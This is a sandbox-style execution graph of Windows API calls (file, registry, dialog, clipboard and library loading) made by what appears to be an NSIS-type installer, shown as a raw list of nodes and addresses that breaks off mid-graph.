                                                                                                      execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d 